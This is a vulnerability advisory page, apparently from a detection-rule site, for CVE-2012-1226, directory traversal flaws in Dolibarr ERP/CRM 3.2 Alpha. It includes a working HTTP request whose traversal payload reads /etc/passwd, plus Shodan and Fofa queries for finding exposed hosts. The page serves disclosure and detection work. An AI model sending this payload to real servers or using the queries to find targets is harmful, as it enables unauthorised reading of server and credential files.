🔙 목록으로 돌아가기

CVE-2012-1226: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities

TitleDolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
Authordaffainfo
SeverityHigh
ImpactSuccessful exploitation of these vulnerabilities could allow an attacker to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.04601
CVE IDCVE-2012-1226
CWE IDCWE-22
Shodan Queryhttp.favicon.hash:440258421
Fofa Queryicon_hash=440258421
Tags cve cve2012 lfi dolibarr traversal edb vuln

🔍 Vulnerability Description

Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.

🌐 HTTP Request

GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2012/CVE-2012-1226.yaml

🦈 Packet Capture: ⬇️ Download cve-2012-1226.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A